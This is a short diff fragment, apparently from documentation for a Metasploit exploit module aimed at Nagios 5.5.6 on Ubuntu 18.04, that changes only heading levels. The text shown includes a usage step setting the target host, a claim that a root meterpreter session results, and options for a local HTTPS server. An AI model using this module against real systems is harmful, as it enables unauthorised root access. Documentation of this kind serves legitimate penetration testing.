 2. `set RHOSTS [IP]`
@@ -23,7 +23,7 @@ The exploit works as follows:

 A meterpreter session should have been opened successfully and you should be root

-# Options
+## Options

 ## RSRVHOST

@@ -41,7 +41,7 @@ IP of your local HTTPS server (must be a local IP).

 Port to listen to for your local HTTPS server.

-# Scenarios
+## Scenarios

 ## Nagios 5.5.6 on Ubuntu 18.04 LTS

--- a/Show More
+++ b/Show More